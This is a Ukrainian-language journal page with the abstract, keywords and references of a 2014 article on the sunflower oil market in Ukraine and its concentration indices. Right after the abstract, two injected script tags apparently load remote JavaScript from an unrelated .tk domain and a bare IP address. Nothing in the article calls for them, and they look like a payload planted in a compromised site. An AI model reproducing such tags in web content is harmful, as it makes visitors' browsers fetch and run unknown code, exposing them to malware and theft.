ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 339.13.021:665.347.8(477)
Сторінка молодого науковця

Маркетинговий аналіз кон’юнктури ринку соняшникової олії в Україні / Наторіна А. О. // Економіка АПК. - 2014. - № 6 - С. 70

Маркетинговий аналіз кон’юнктури ринку здійснено на прикладі підприємств олієжирового комплексу України. Дослідження тенденцій розвитку національного ринку соняшникової олії проведено на основі аналізу основних показників, що відображають стан ринку, розраховано показник його ємності. Проаналізовано обсяги виробництва найбільших виробників національного ринку соняшникової олії й виявлено основні зміни позицій підприємств за досліджуваний період. Проведено діагностику рівня конкуренції підприємств на ринку соняшникової олії в Україні. Для кількісного вираження конкуренції розраховані показники оцінки ступеня монополізації із застосуванням методів, заснованих на розрахунку індексів концентрації та Херфіндаля-Хіршмана. Табл.: 2. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ємність ринку, рівень конкуренції, оцінка ступеня монополізації ринку, кон’юнктура ринку соняшникової олії, маркетинговий аналіз

Список використаних джерел

 1. Мостовий С.П. Обґрунтування виробничої програми підприємства в ринкових умовах [Текст] / С.П. Мостовий, Е.П. Чекаліна, Н.Г. Сікєтіна // Сборник науч. трудов «Вест. НТУ «ХПИ»: Технічний прогрес та ефективність виробництва. – 2011. – № 8. – С.122-124.
 2. Пєтєшова Т.А. Діагностичні підходи до визначення рівня інтенсивності конкуренції на галузевому ринку / Т.А. Пєтєшова // Маркетинг і менеджмент інновацій. – 2011. – №4. – Т. ІІ. – С.111-117.
 3. Салькова І.Ю. Оцінка рівня конкуренції ринку олії в Україні / І.Ю. Салькова // Економіка і регіон. – 2011. – №4(23). – С.87-90.
 4. Недоризанюк Т. Топ-10 производителей сырого подсолнечного масла в 2011/12 МГ / Т. Недоризанюк [Електронний ресурс]: Топ новости Grain Ukraine. – Режим доступу: http://anyfoodanyfeed.com/ru/news/id/24360.
 5. Подсолнечное масло [Електронний ресурс]: Товары / Растительные масла // Украина. – Режим доступу: http://www.agrochart.com/ru/statistic/products/product/ 190/section/56. – Назва з домашньої сторінки Інтернету.
 6. Толмачев М.Н. Методология расчета показателей концентрации сельскохозяйственного производства / М.Н. Толмачев // Вест. НГУ. Серия: Социально-экономические науки. – 2010. – Т.10. – Вып. 2. – С. 103-111.
 7. Украина. Рейтинг производителей сырого подсолнечного масла в 2012/13МГ [Електронний ресурс]: Растительные масла. – Режим доступу: http://www.agrochart. соm/ru/news/news/210213/ukraina-rejting-proizvoditelej-syirogo-podsolnechn/.
 8. Экспорт подсолнечного масла [Електронний ресурс]: Товары / Растительные масла // Экспорт. – Режим доступу: http://www.agrochart.com/ru/statistic/products/ product/190/section/71.
 9. Kotler P., Lee N. (2005) “Corporate Social Responsibility: Doing the most Good for Your Company and Your Cause”, Hoboken. New Jersey: John Wiley & Sons, Inc.
 10. Porter M.E., Elizabeth Olmsted Teisberg E.O. (2006) “Redefining Health Care: Creating Value-Based Competition on Results”, Boston: Harvard Business School Press, 506 p.
 11. Porter M.E. (2008, January) “The Five Competitive Forces That Shape Strategy”, Harvard Business Review, pp. 79-93.
 12. Kramer M.R., Porter M.E. (2006, December) “Strategy & Society: The link between Competitive Advantages and Corporate Social Responsibility”, Harvard Business Review, 84(12).
Читати статтю: 14_06_70-73.pdf
Читати переклад статті: 1406natorina.pdf